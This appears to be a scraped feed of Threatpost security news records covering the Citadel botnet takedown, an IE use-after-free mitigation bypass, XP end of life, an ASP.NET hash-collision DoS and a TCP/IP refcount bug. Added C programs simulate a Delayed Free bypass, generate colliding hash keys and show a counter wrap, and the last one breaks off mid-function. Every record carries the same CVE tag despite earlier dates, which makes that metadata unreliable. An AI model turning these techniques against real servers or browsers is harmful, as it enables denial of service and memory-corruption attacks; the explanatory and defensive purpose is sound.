decade, which then topples over and turns an entire class of bugs deemed un-exploitable on non-virtualized systems into potential vulnerabilities on virtualized systems. Backwards time warp and a table full of fallen dominoes,\u201d they wrote.\n\nThis may seem an isolated, extreme case, but there have been other examples in the last few months of the same kind of assumptions being ground to pieces under the wheels of logic and ingenuity. 
After the disclosure of the high-profile attack on Google and other big companies last fall, word quickly leaked out that the flaw used to compromise the search giant was an unpatched problem in Internet Explorer. Several experts said the problem couldn\u2019t be exploited on IE 8 on Windows 7 because of the memory protections that Microsoft had added.\n\nWithin a few days, that was proven false as researcher Dino Dai Zovi, followed by others, used the [same exploit on a Windows 7 machine running IE 8](<https://threatpost.com/memory-protections-advance-exploits-stay-step-ahead-030810/>), a technique he demonstrated live at the RSA Conference in March. The point, Dai Zovi and others maintain, is that exploit mitigations are just that: mitigations.\n\n\u201cAttack mitigation takes the universe of exploit techniques and narrows it down,\u201d Dai Zovi said during his RSA talk. \u201cBut preventing the introduction of malicious code isn\u2019t enough to prevent malicious computations.\u201d\n\nThat\u2019s a point that\u2019s becoming ever clearer.\n\n\u201cMicrosoft claims that the Virtual PC problem \u2018isn\u2019t a vulnerability _per se_\u2019 because the problem described only affects \u201csecurity-in-depth\u201d mechanisms and attackers would need to find and exploit an actual implementation bug to leverage it. Even if Microsoft is right on that count (which we don\u2019t think they are), they are ignoring the bigger issue of assumptions. Bugs previously deemed non-exploitable for anything other than crashing systems are now potentially exploitable under a virtualized OS. 
Because of the way bugs are slated for mitigation in the real world, a majority of those bugs remain unpatched \u2014 a problem of prioritization and the enormity of the bug pile in applications,\u201d McGraw and Arce conclude.\n", "cvss3": {}, "published": "2010-05-03T19:10:03", "type": "threatpost", "title": "How Assumptions May Be Making Us All Less Secure", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:37:06", "id": "THREATPOST:77E27FE5A07B4C4146B818CE438E0AAA", "href": "https://threatpost.com/how-assumptions-may-be-making-us-all-less-secure-050310/73913/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:00:41", "description": "**UPDATE** \u2013 Calling it the company\u2019s \u201cmost aggressive\u201d botnet operation to date, Microsoft has joined with the FBI for a massive disruption of the Citadel botnet.\n\nMore than 1,400 individual botnets associated with the Citadel malware, affecting more than five million people in total, were disrupted, with cooperation from the Federal Bureau of Investigation and, interestingly, a civil seizure warrant issued by the U.S. 
District Court for the Western District of North Carolina.\n\nGroups like the Financial Services \u2013 Information Sharing and Analysis Center (FS-ISAC), NACHA \u2013 The Electronic Payments Association, the American Bankers Association (ABA) and Agari, an email phishing authentication firm, all helped chip in intelligence as well.\n\nWhile this was the seventh botnet operation of its kind coordinated by Microsoft, this is the first time the company has worked with the law enforcement sector to secure a civil seizure warrant to carry out its plans.\n\nRichard Boscovich, the Assistant General Counsel of Microsoft\u2019s Digital Crimes Unit, wrote about the operation \u2013 codenamed Operation b54 \u2013 on [the company\u2019s Technet blog](<http://blogs.technet.com/b/microsoft_blog/archive/2013/06/05/microsoft-works-with-financial-services-industry-leaders-law-enforcement-and-others-to-disrupt-massive-financial-cybercrime-ring.aspx>) last night, claiming the action won\u2019t fully eradicate the Citadel malware but should \u201csignificantly\u201d curb the botnet going forward.\n\n\u201cDue to Citadel\u2019s size and complexity, we do not expect to fully take out all of the botnets in the world using the Citadel malware,\u201d he wrote, \u201chowever, we do expect that this action will significantly disrupt Citadel\u2019s operation.\u201d\n\nTechnical details on the operation are somewhat scant, but Microsoft says the operation culminated yesterday after officials from Microsoft, assisted by U.S. Marshals, helped remove servers from two data hosting facilities in New Jersey and Pennsylvania. 
The takedown was set into motion last week after the North Carolina court order successfully cut off communication between the Citadel botnets, 1,462 in total, and their infected machines.\n\nAgari, a Palo Alto-based email phishing authentication firm, had a big hand in helping Microsoft obtain the seizure warrant.\n\nWhile the full operation took about a year, Agari spent six of those months poring over phishing emails that were pulling unsuspecting users into the Citadel botnet.\n\nAgari CEO Patrick Peterson described how the company helped monitor the emails that led to the seizure of the servers in Pennsylvania and New Jersey.\n\n\u201cOur whole system is designed to isolate these malicious emails and to get that forensic data for law enforcement, for our customers, for the industry to be able to track the bad guys,\u201d Peterson explained. \u201cIn this case working with our partners, the FBI, Microsoft, FS-ISAC, we were able to customize the focus of that specifically around that Citadel botnet.\u201d\n\nThe company monitored approximately 2.5 million malicious URLs every month, and while not every one of those URLs led to the Citadel malware, all of them were pretending to come from a legitimate bank.\n\nAgari is part of FS-ISAC\u2019s Trusted Registry Program, a program dedicated to securing the emails the financial services industry sends out. FS-ISAC reached out to Microsoft about Agari\u2019s wealth of phishing emails and the company joined the investigation from there.\n\n\u201cI think it\u2019s a great day for everyone involved,\u201d Peterson said. \u201cIt\u2019s certainly a day when everyone on the internet is safer than they were yesterday, and that doesn\u2019t happen very often.\u201d\n\nThe Citadel Trojan has been spotted mining all types of financial information, including banking logins and passwords, since [being introduced a year and a half ago](<http://threatpost.com/citadel-malware-authors-adopt-open-source-development-model-020812/>). 
To date it\u2019s believed the botnet is responsible for more than half a billion dollars in financial loss.\n\nPeddled primarily on a handful of underground forums as a variant of the Zeus Trojan, the malware has long been cloaked in secrecy. Owners insist on distributing their kit among trusted insiders, [hoping to keep law enforcement out and support costs down](<http://threatpost.com/citadel-trojan-updates-dynamic-config-mechanism-streamlines-fraud-activity-101812/>).\n\nMicrosoft has taken a hard line on cybercrime over the last several years, and much of that is due to [the work being done by its Digital Crimes Unit](<http://threatpost.com/at-microsoft-a-sharpened-focus-on-cybercrime/>). The DCU, a collection of Microsoft engineers, security experts and lawyers, has proved successful at shutting down botnets that are largely dependent on a centralized infrastructure, including Kelihos, Zeus, Waledac and Rustock.\n\nIn [a discussion with Threatpost\u2019s Dennis Fisher last month](<http://threatpost.com/qa-microsofts-tj-campana/>), T.J. Campana, the DCU\u2019s Director of Security, said the group tries to take a transparent approach with its takedowns.\n\n\u201cWe\u2019re not just going out there shooting stuff. We walk in with a pile of legal documents. 
We\u2019re asking for a judge to agree with what we found,\u201d Campana said of the group\u2019s actions at the time.\n", "cvss3": {}, "published": "2013-06-06T13:38:55", "type": "threatpost", "title": "Operation b54 Knocks 1,000+ Citadel Botnets Offline", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-06-10T19:43:44", "id": "THREATPOST:AD20F9744EB0E2E4D282F681451B4FBD", "href": "https://threatpost.com/microsoft-authorities-disrupt-hundreds-of-citadel-botnets-with-operation-b54/100902/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:57:31", "description": "For a long time, Microsoft\u2019s monthly Patch Tuesday security bulletins have periodically addressed use-after-free vulnerabilities, the latest class of memory corruption bugs to find their way into a number of targeted attacks.\n\nMicrosoft has implemented mitigations to address memory-related vulnerabilities that afford successful attackers control over the underlying computer. Most notably, Microsoft has stood behind its Enhanced Mitigation Experience Toolkit, or EMET, suggesting it on several occasions as a temporary mitigation for a vulnerability until the company could push out a patch to users.\n\nMost recently, Microsoft brought new memory defenses to the browser, loading Internet Explorer with two new protections called Heap Isolation and Delayed Free, both of which take steps inside IE to frustrate and deny the execution of malicious code.\n\nResearchers have had a growing interest in [bypassing EMET and memory protections](<http://threatpost.com/microsoft-emet-bypasses-realm-of-white-hats-for-now/104619>) for some time, with some [successful bypasses](<http://threatpost.com/researchers-develop-complete-microsoft-emet-bypass/104437>) disclosed and ultimately addressed by Microsoft. 
And until the [Operation Snowman attacks](<http://threatpost.com/new-ie-10-zero-day-targeting-military-intelligence/104272>), they were exclusively the realm of white hats\u2014as far as we know publicly.\n\nAs with the [EMET protections](<http://threatpost.com/pwn2own-paying-150000-grand-prize-for-microsoft-emet-bypass/104015>), Heap Isolation and Delayed Free were bound to attract some attention, and last week at ShmooCon, a hacker conference in Washington, D.C., Bromium Labs principal security researcher Jared DeMott successfully demonstrated a bypass for both.\n\nDeMott\u2019s bypass relies on what he termed a weakness in Microsoft\u2019s approach with the new protections. With Heap Isolation, a new heap is created housing sensitive internal IE objects, while objects such as JavaScript objects that are likely to be targeted remain in the default heap, he said.\n\n\u201cThus if a UaF condition appears, the attacker should not be able to replace the memory of the dangling pointer with malicious data,\u201d he wrote in a [report](<http://labs.bromium.com/2015/01/17/use-after-free-new-protections-and-how-to-defeat-them/>) published this week. This separation of good and bad data, however, isn\u2019t realistic given the complexity of code and objects. 
Delayed Free then kicks in by delaying the release of an object\u2019s memory until there are no references to the object on the stack and 100,000 bytes are waiting to be freed, DeMott said.\n\nTaking advantage of these conditions, DeMott\u2019s bypass works through the use of what he calls a \u201clong-lived dangling pointer.\u201d\n\n\u201cIf an attacker can locate a UaF bug that involves code that maintains a heap reference to a dangling pointer, the conditions to actually free the object under the deferred free protection can be met (no stack references or call chain eventually unwinds),\u201d DeMott said. \u201cAnd finding useful objects in either playground to replace the original turns out not to be that difficult either.\u201d\n\n[DeMott\u2019s bypass is a Python script](<https://bromiumlabs.files.wordpress.com/2015/01/allocationinformation-py.zip>) which searches IE for all objects, their sizes, and whether each object is allocated on the default or the isolated heap.\n\n\u201cThis information can be used to help locate useful objects to attack either heap,\u201d he wrote. \u201cAnd with a memory garbage collection process known as coalescing the replacement object does not even have to be the same size as the original object.\u201d\n\nDeMott said an attack would be similar to other client-side attacks. A victim would have to be lured to a website via phishing or a watering hole attack and be infected with the exploit.\n\n\u201cIf you have a working UaF bug, you have to make sure it\u2019s of this long-lived type and can basically upgrade it to an existing attack to bypass these mitigations,\u201d DeMott told Threatpost. 
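As an added illustration written for this page (not DeMott's script, nor Microsoft or Bromium code), the toy allocator below models the Delayed Free rule described above and shows why a heap-held dangling pointer defeats it while a stack-held one does not. Everything in it is an assumption chosen to keep the scenario small: eight 64-byte chunks stand in for the IE heap, a 256-byte backlog stands in for the 100,000-byte threshold, and the "stack scan" is a list of chunk indices supplied by the caller rather than a real walk of the stack.

```c
#include <stdbool.h>
#include <stdio.h>
#include <string.h>

/* Added example: a toy heap with a Delayed Free mitigation.
 * Chunk count, chunk size and the 256-byte threshold are assumptions
 * chosen so the scenario fits in a few allocations; IE waits for 100,000 bytes. */
#define CHUNK_SIZE      64
#define NCHUNKS         8
#define DEFER_THRESHOLD 256

typedef struct { unsigned char data[CHUNK_SIZE]; bool in_use; } chunk_t;

static chunk_t arena[NCHUNKS];
static int     pending[NCHUNKS];   /* chunks queued by deferred_free() */
static int     npending;
static size_t  pending_bytes;

static void arena_reset(void) {
    memset(arena, 0, sizeof arena);
    npending = 0;
    pending_bytes = 0;
}

/* Lowest free chunk first: a released chunk is handed straight back to the
 * next same-size request, which is what a UaF replacement relies on. */
static int toy_alloc(void) {
    for (int i = 0; i < NCHUNKS; i++)
        if (!arena[i].in_use) { arena[i].in_use = true; return i; }
    return -1;
}

static void real_free(int idx) {
    arena[idx].in_use = false;
    memset(arena[idx].data, 0xDD, CHUNK_SIZE);   /* poison the freed contents */
}

/* Delayed Free: the release is queued instead of performed. */
static void deferred_free(int idx) {
    pending[npending++] = idx;
    pending_bytes += CHUNK_SIZE;
}

/* Flush the queue once the backlog is large enough, skipping any chunk that
 * the (simulated) stack scan still finds a reference to. */
static void delayed_free_tick(const int *stack_refs, int nrefs) {
    if (pending_bytes < DEFER_THRESHOLD) return;
    int kept = 0;
    for (int i = 0; i < npending; i++) {
        bool on_stack = false;
        for (int j = 0; j < nrefs; j++)
            if (stack_refs[j] == pending[i]) on_stack = true;
        if (on_stack) pending[kept++] = pending[i];
        else { real_free(pending[i]); pending_bytes -= CHUNK_SIZE; }
    }
    npending = kept;
}

/* Attacker churn: allocate and free filler until the backlog reaches the threshold. */
static void churn_until_threshold(void) {
    while (pending_bytes < DEFER_THRESHOLD) {
        int f = toy_alloc();
        if (f < 0) return;
        deferred_free(f);
    }
}

/* Case 1: the dangling pointer is a local of the code that freed the object.
 * Returns 1 if the victim's memory was NOT replaced, i.e. the mitigation held. */
int uaf_with_stack_reference(void) {
    arena_reset();
    int victim = toy_alloc();
    memcpy(arena[victim].data, "VICTIM-OBJECT", 14);
    int dangling = victim;                  /* still live on the stack */
    deferred_free(victim);
    churn_until_threshold();
    delayed_free_tick(&dangling, 1);        /* scan finds the reference: victim stays queued */
    int spray = toy_alloc();                /* attacker gets a different chunk */
    memcpy(arena[spray].data, "ATTACKER-CONTROLLED", 20);
    return spray != dangling && memcmp(arena[dangling].data, "VICTIM-OBJECT", 14) == 0;
}

/* Case 2: DeMott's long-lived dangling pointer. The reference lives in another
 * heap object and the freeing function has returned, so the stack scan sees
 * nothing and the chunk is really released. Returns 1 if the stale pointer
 * now reads attacker data, i.e. the mitigation was bypassed. */
int uaf_with_heap_reference(void) {
    arena_reset();
    int victim = toy_alloc();
    memcpy(arena[victim].data, "VICTIM-OBJECT", 14);
    int holder = toy_alloc();               /* heap object that keeps a pointer to victim */
    memcpy(arena[holder].data, &victim, sizeof victim);
    deferred_free(victim);                  /* freeing function returns: no stack refs remain */
    churn_until_threshold();
    delayed_free_tick(NULL, 0);             /* nothing on the stack: victim is freed for real */
    int spray = toy_alloc();                /* attacker gets victim's chunk back */
    memcpy(arena[spray].data, "ATTACKER-CONTROLLED", 20);
    int dangling;
    memcpy(&dangling, arena[holder].data, sizeof dangling);
    return spray == dangling && memcmp(arena[dangling].data, "ATTACKER", 8) == 0;
}

int main(void) {
    printf("stack-held dangling pointer, mitigation held:    %d\n", uaf_with_stack_reference());
    printf("heap-held dangling pointer, mitigation bypassed: %d\n", uaf_with_heap_reference());
    return 0;
}
```

The two cases differ only in where the stale reference is stored; the churn loop is the attacker's part of the job, since without enough pending bytes the queue never flushes and the victim chunk is never handed out again.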
\u201cThere\u2019s no secret sauce, like every attack, it just depends on a good bug.\u201d\n\nDeMott said he expects use-after-free to be the next iteration of memory corruption attacks.\n\n\u201cThere\u2019s always a need [for attackers] to innovate,\u201d DeMott said, pointing out that Microsoft deployed ASLR and DEP in response to years of buffer overflow and heap spray attacks, only to be thwarted by attackers with use-after-free vulnerabilities. \u201cIt\u2019s starting to happen, it\u2019s coming if it\u2019s not already here.\u201d\n", "cvss3": {}, "published": "2015-01-21T11:40:11", "type": "threatpost", "title": "Bypass Demonstrated for Microsoft Use-After-Free Mitigation in IE", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2015-01-21T16:40:11", "id": "THREATPOST:14FF20625850B129B7F957E8393339F1", "href": "https://threatpost.com/bypass-demonstrated-for-microsoft-use-after-free-mitigation-in-ie/110570/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:59:05", "description": "For those of you anticipating the start of a Walking Dead-style malware apocalypse next Tuesday, calm yourselves.\n\nThe official end of security support for Windows XP is upon us, but it\u2019s important to check some anxiety at the door and keep some perspective.\n\n\u201cI\u2019ve been a forensics investigator for 14 years and in my experience, I don\u2019t know that I\u2019ve come across one incident, or very few anyway, where a vulnerability was exploited where an unpatched system wasn\u2019t the source of a breach,\u201d said Christopher Pogue, director at Trustwave. Pogue said breaches are much more likely to be blamed on poor passwords, weak access control systems or a poorly configured firewall than on a glaring hole in the underlying operating system.\n\n\u201cAll the administration stuff in place around these systems falls down. 
Attackers leverage that because they want the path of least resistance,\u201d Pogue said. \u201cYou have to presume that before they get their exploit on an unpatched XP machine, they have to breach the environment, bypass firewalls, get to the system, pivot to the unpatched system and hope it has critical data on it so they can run exploit code. There are a whole lot of items that have to line up for that to happen.\u201d\n\nThe hype and hyperbole around April 8, the latest in a long line of security Doomsdays, is rooted in theories that because a good number of XP systems remain in use storing data and processing transactions, any previously unreported XP vulnerabilities will be perpetual zero-days. The theory continues that attackers have been building and hoarding XP exploits, anxiously wringing their hands waiting for April 8, 2014 to come and go.\n\nNow to dismiss all of that as FUD is foolhardy; some attackers who do have [XP exploits that will be zero days](<http://threatpost.com/microsoft-to-fix-word-zero-day-with-final-xp-patch/105241>) in a matter of five days are going to wait. Others are less patient (see the recent [XP Rich Text Format zero day](<http://threatpost.com/targeted-attacks-exploit-microsoft-word-zero-day/104980>) that will be patched on Tuesday). And for those smaller organizations with fewer IT resources that may still be running XP machines that hum along carrying out their mission day after day, their risk posture will be slouching a little more come Tuesday.\n\nBig picture, however, people are moving off of XP. Qualys CTO Wolfgang Kandek published some numbers based off the company\u2019s flagship vulnerability scanning service that indicate the XP installed base had dipped to below 15 percent, down from 35 percent 14 months ago. 
Migrations in the transportation and health care industries are much more dramatic, he said.\n\n\u201cThese are two extremes, but all industries are showing a downward slope (migrating off XP); none are stagnant,\u201d Kandek said.\n\nKandek is in the camp that attackers will intensify their targeting of XP machines and in particular will look at patches for modern Windows 7 and 8 systems and determine whether those vulnerabilities could be present in no-longer-supported XP machines. He also urges organizations that must use XP to isolate those machines from the network, keep them for a specialized purpose and keep them offline.\n\n\u201cIn May, Microsoft will publish bulletins and patches, and those can be taken by a hacker and reverse-engineered. They will ask \u2018What does it fix?\u2019 And once they know what it does on Windows 7 or 8, that it changes a DLL or fixes an overflow, they could go into XP and figure out whether the same DLL or the same overflow vulnerability exists,\u201d Kandek said. \u201cPatches map to vulnerabilities that could be in XP. Sometimes they\u2019re only in a new component of Windows 7, but most of the time you can find those vulnerabilities in XP.\u201d\n\nKandek said that roughly 70 percent of vulnerabilities that were patched in 2013 were found in Windows 8 through XP.\n\n\u201cI don\u2019t see why that would stop in May, June or July. Attackers can use that knowledge as a pointer into XP to find if a vulnerability exists. It\u2019s an accelerator for them. My feeling is that after two or three months, there will be tools in public that reliably exploit XP. I can definitely see how that would make an attacker\u2019s work much easier.\u201d\n\nA key difference to point out, however, is that Windows 7 and 8, for example, are radically different under the hood than XP. Microsoft has invested time and money into building mitigations for a number of dangerous memory-based attacks. 
Technologies such as ASLR and DEP make it much more challenging and costly for an attacker to execute malicious code against vulnerabilities in the operating system. Looking for bugs in XP that also live in Windows 7 or 8 just may not be the best use of resources for an attacker.\n\n\u201cAn attacker has always chosen the path of least resistance to gain access to a system; they don\u2019t have to exploit the operating system, and for the most part, haven\u2019t,\u201d Trustwave\u2019s Pogue said. \u201cWhile it\u2019s still possible, if I were a small business owner running XP to store and process data, I\u2019d be concerned about it and take steps to run an updated and patched operating system. Even so, it\u2019s important to remember that\u2019s not a silver bullet. Updating to Windows 7 doesn\u2019t mean you\u2019re necessarily safe. You have to build up defense-in-depth mechanisms. XP has been updated and patched up to now, and I\u2019ve investigated thousands of breaches on XP systems. An updated OS does not always equal security.\u201d\n", "cvss3": {}, "published": "2014-04-04T12:13:55", "type": "threatpost", "title": "Windows XP End of Life Breeding FUD, Legit Concerns", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2014-04-07T17:28:37", "id": "THREATPOST:1FDD4D6EFB350CC9F6F42A5514AA6849", "href": "https://threatpost.com/windows-xp-end-of-life-breeding-equal-parts-fud-legit-concerns/105252/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:04:06", "description": "**UPDATED** Microsoft on Thursday plans to release an emergency out-of-band update to address a vulnerability in ASP.NET that could allow an attacker to consume all of the resources on a vulnerable server with a single specially designed HTTP request. 
A wide range of Web platforms are vulnerable to this attack, and Microsoft officials said they\u2019re releasing the patch now because they expect exploit code to be released in the near future.\n\nThe vulnerability was discussed at the Chaos Communication Congress conference in Germany earlier this week, although some form of the problem has been known for several years. In addition to ASP.NET, the flaw affects a number of other languages and platforms, including Java, Ruby, Apache Tomcat and the V8 JavaScript engine.\n\nMicrosoft pushed the [patch out for the vulnerability](<https://technet.microsoft.com/en-us/security/bulletin/ms11-100>) on Thursday afternoon, and recommended that customers with vulnerable installations deploy the patch immediately.\n\n\u201cThis vulnerability could allow an anonymous attacker to efficiently consume all CPU resources on a web server, or even on a cluster of web servers. For ASP.NET in particular, a single specially crafted ~100kb HTTP request can consume 100% of one CPU core for between 90 \u2013 110 seconds. An attacker could potentially repeatedly issue such requests, causing performance to degrade significantly enough to cause a denial of service condition for even multi-core servers or clusters of servers,\u201d [Microsoft\u2019s Susha Can and Jonathan Ness said](<https://blogs.technet.com/b/srd/archive/2011/12/27/more-information-about-the-december-2011-asp-net-vulnerability.aspx?Redirected=true>) in a blog post about the problem.\n\n\u201cThe root cause of the vulnerability is a computationally expensive hash table insertion mechanism triggered by an HTTP request containing thousands and thousands of form values. Therefore, any ASP.NET website that accepts requests having HTTP content types application/x-www-form-urlencoded or multipart/form-data are likely to be vulnerable. 
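The collision mechanism behind that root cause, as an added example written for this page rather than code from Microsoft or from the researchers: a chained hash table using DJBX33A (PHP's multiply-by-33 string hash, assumed here as a stand-in because the page does not spell out the ASP.NET hash) ingests 1,024 form-field names that all hash to the same value and counts the string comparisons its duplicate check performs. The 1,024-bucket table, the "field%d" control keys and the 1,000-key cap are assumptions; the cap mirrors the limit on form keys that the MS11-100 fix added (aspnet:MaxHttpCollectionKeys, default 1000).

```c
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Added example, not Microsoft's or the researchers' code. A chained hash
 * table with a multiply-by-33 hash (DJBX33A, PHP's function, used here as a
 * stand-in for ASP.NET's) models a form-value collection that checks for an
 * existing key before inserting a new one. */
#define KEY_BLOCKS 10                     /* 2^10 = 1024 colliding keys */
#define KEY_LEN    (2 * KEY_BLOCKS)
#define MAX_KEYS   (1 << KEY_BLOCKS)
#define NBUCKETS   1024                   /* assumption */

typedef struct node { const char *key; struct node *next; } node_t;
typedef struct {
    node_t *bucket[NBUCKETS];
    node_t  nodes[MAX_KEYS];
    size_t  nkeys;
    unsigned long compares;               /* strcmp calls: the CPU cost being attacked */
} table_t;

static uint32_t djbx33a(const char *s) {
    uint32_t h = 5381;
    while (*s) h = h * 33 + (unsigned char)*s++;
    return h;
}

/* Insert with a duplicate check. Returns 0 on insert, 1 if the key already
 * existed, -1 if the collection is over its key cap (max_keys == 0: no cap). */
static int table_insert(table_t *t, const char *key, size_t max_keys) {
    if (max_keys && t->nkeys >= max_keys) return -1;
    uint32_t b = djbx33a(key) % NBUCKETS;
    for (node_t *n = t->bucket[b]; n; n = n->next) {
        t->compares++;
        if (strcmp(n->key, key) == 0) return 1;
    }
    node_t *fresh = &t->nodes[t->nkeys++];
    fresh->key = key;
    fresh->next = t->bucket[b];
    t->bucket[b] = fresh;
    return 0;
}

/* "Ez" and "FY" hash to the same value under h*33+c (69*33+122 == 70*33+89),
 * so every string built from those two-byte blocks collides with every other:
 * KEY_BLOCKS blocks give 2^KEY_BLOCKS colliding keys. */
static char colliding[MAX_KEYS][KEY_LEN + 1];
static char distinct[MAX_KEYS][KEY_LEN + 1];   /* ordinary field names as a control */

static void build_keys(void) {
    for (int i = 0; i < MAX_KEYS; i++) {
        for (int b = 0; b < KEY_BLOCKS; b++)
            memcpy(colliding[i] + 2 * b, ((i >> b) & 1) ? "FY" : "Ez", 2);
        colliding[i][KEY_LEN] = '\0';
        snprintf(distinct[i], sizeof distinct[i], "field%d", i);
    }
}

/* Total strcmp work to ingest n keys, or -1 if the cap rejected the request. */
long ingest_cost(char keys[][KEY_LEN + 1], size_t n, size_t max_keys) {
    table_t *t = calloc(1, sizeof *t);
    int rejected = 0;
    for (size_t i = 0; i < n && !rejected; i++)
        if (table_insert(t, keys[i], max_keys) < 0) rejected = 1;
    long cost = rejected ? -1 : (long)t->compares;
    free(t);
    return cost;
}

long colliding_cost(size_t max_keys) { build_keys(); return ingest_cost(colliding, MAX_KEYS, max_keys); }
long distinct_cost(size_t max_keys)  { build_keys(); return ingest_cost(distinct,  MAX_KEYS, max_keys); }
int  blocks_collide(void)            { return djbx33a("Ez") == djbx33a("FY"); }

int main(void) {
    printf("Ez/FY collide under DJBX33A: %d\n", blocks_collide());
    printf("1024 ordinary keys:          %ld compares\n", distinct_cost(0));
    printf("1024 colliding keys:         %ld compares (n*(n-1)/2)\n", colliding_cost(0));
    printf("1024 colliding keys, cap of 1000: %ld (request rejected)\n", colliding_cost(1000));
    return 0;
}
```

With every key in one chain the duplicate check degrades to n(n-1)/2 comparisons, which is the quadratic cost a single request buys. Note that xor-ing a random seed into the initial value of h would not help here: the Ez/FY difference cancels whatever the starting value is, which is why durable fixes use a keyed hash or, as the ASP.NET patch did, a cap on the number of keys.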
This includes the default configuration of IIS when ASP.NET is enabled and also the majority of real-world ASP.NET websites.\u201d\n\nIn its [advisory on the ASP.NET issue](<https://technet.microsoft.com/en-us/security/advisory/2659883>), Microsoft suggests a workaround for the problem. The workaround decreases the maximum size of a request that the server will accept, which lowers the likelihood of the server being susceptible to the attack.\n\n\u201cThis configuration value can be applied globally to all ASP.NET sites on a server by adding the entry to root web.config or applicationhost.config. Alternatively, this configuration can be restricted to a particular site or application by adding it to a web.config file for the particular site or application,\u201d the advisory says.\n\nThe security researchers who published details of the vulnerability, Alexander Klink and Julian Walde, also discuss workarounds and mitigations for the problem in [their paper](<http://www.nruns.com/_downloads/advisory28122011.pdf>). \n", "cvss3": {}, "published": "2011-12-29T15:31:23", "type": "threatpost", "title": "Microsoft to Release Emergency Fix for ASP.NET DoS Flaw", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:33:05", "id": "THREATPOST:66D2F7851992FD5FC9934A5FE7A68E9F", "href": "https://threatpost.com/microsoft-release-emergency-fix-aspnet-dos-flaw-122911/76039/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:04:27", "description": "Microsoft has patched a serious vulnerability in the Windows TCP/IP stack that, under some conditions, could enable an attacker to run code on remote machines. 
The flaw lies in the way that the stack handles large amounts of specially formatted packets sent to a vulnerable machine.\n\nMicrosoft officials said that the vulnerability, which is one of a handful of flaws fixed by the company in November\u2019s Patch Tuesday release, is a serious one, but that the scenarios in which it can be exploited for remote code execution are limited. The vulnerability crops up when an attacker sends a large volume of crafted UDP packets to a machine on a port that doesn\u2019t have any service listening on it.\n\n\u201cWhile processing these network packets it is observed that some used structures are referenced but not dereferenced properly. This unbalanced reference counting could eventually lead to an integer overflow of the reference counter,\u201d [Microsoft\u2019s SWIAT team](<https://threatpost.com/microsoft-patches-critical-bug-windows-tcpip-stack-110911/>) said in a blog post on the vulnerability.\n\nIn order for the bug to be exploitable, some specific conditions need to be present. If a dereference happens immediately after the counter has gone back to zero, Windows will free the structure. If that happens, there are four things that can occur, Microsoft said: \n\u2022 The memory is still mapped and contains the old data. No crash results and the system works as normal. \n\u2022 The memory is unmapped and the system crashes when it is referenced. This results in a system denial-of-service. \n\u2022 The memory is re-allocated for the same structure. No crash results and the system works as normal. \n\u2022 The memory is re-allocated for a different structure. 
This could result in a system crash, or if attacker-controlled data is present, could lead to memory corruption or remote code execution.\n\nThe last scenario in the list is the one that could lead to remote code execution, the company said.\n\n\u201cWhile the last scenario can theoretically lead to RCE, we believe it is difficult to achieve RCE using this vulnerability considering that the type of network packets required are normally filtered at the perimeter and the small timing window between the release and next access of the structure, and a large number of packets are required to pull off the attack,\u201d Microsoft\u2019s team said.\n", "cvss3": {}, "published": "2011-11-09T15:20:26", "type": "threatpost", "title": "Microsoft Patches Critical Bug in Windows TCP/IP Stack", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:33:23", "id": "THREATPOST:F73CA4042B0D13ED4A29DED46F90E099", "href": "https://threatpost.com/microsoft-patches-critical-bug-windows-tcpip-stack-110911/75872/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:58:15", "description": "Microsoft today re-released [security bulletin MS14-045](<http://threatpost.com/microsoft-yet-to-deliver-fix-for-faulty-patch-tuesday-update/107809>), which was pulled shortly after the [August Patch Tuesday updates](<http://threatpost.com/microsoft-keeps-focus-on-ie-security-with-patch-tuesday-updates/107729>) because a number of users reported crashes and blue screens. The patch was removed from Windows Update on Aug. 15, three days after it was released as part of Microsoft\u2019s monthly patch cycle.\n\n\u201cAs soon as we became aware of some problems, we began a review and then immediately pulled the problematic updates, making these unavailable to download,\u201d said Tracey Pretorius, director, Trustworthy Computing at Microsoft. 
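The four outcomes Microsoft lists for the TCP/IP flaw above all follow from one event: a reference counter that is incremented for every packet but never decremented eventually wraps to zero, and the next properly balanced release frees the structure while its owner still holds it. The C program below is an added illustration, not Microsoft's code. It uses a 16-bit counter so the wrap is reachable in a loop of 65,536 iterations (an assumption; the width of the real counter is not stated), and puts the leaky handler beside a balanced one and a saturating take that refuses to wrap.

```c
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>

/* Per-connection state guarded by a reference count. A 16-bit counter is an
 * assumption that keeps the wrap reachable in a short loop; the advisory does
 * not state the width of the counter in the Windows stack. */
struct pkt_ctx {
    uint16_t refcount;
};

struct pkt_ctx *ctx_new(void)
{
    struct pkt_ctx *c = calloc(1, sizeof *c);
    if (!c)
        abort();
    c->refcount = 1;                  /* the owner's reference */
    return c;
}

static void ctx_ref(struct pkt_ctx *c)
{
    c->refcount++;                    /* wraps silently from 65535 to 0 */
}

/* Drop one reference; returns 1 if this drop reached zero and freed the object. */
static int ctx_unref(struct pkt_ctx *c)
{
    if (--c->refcount == 0) {
        free(c);
        return 1;
    }
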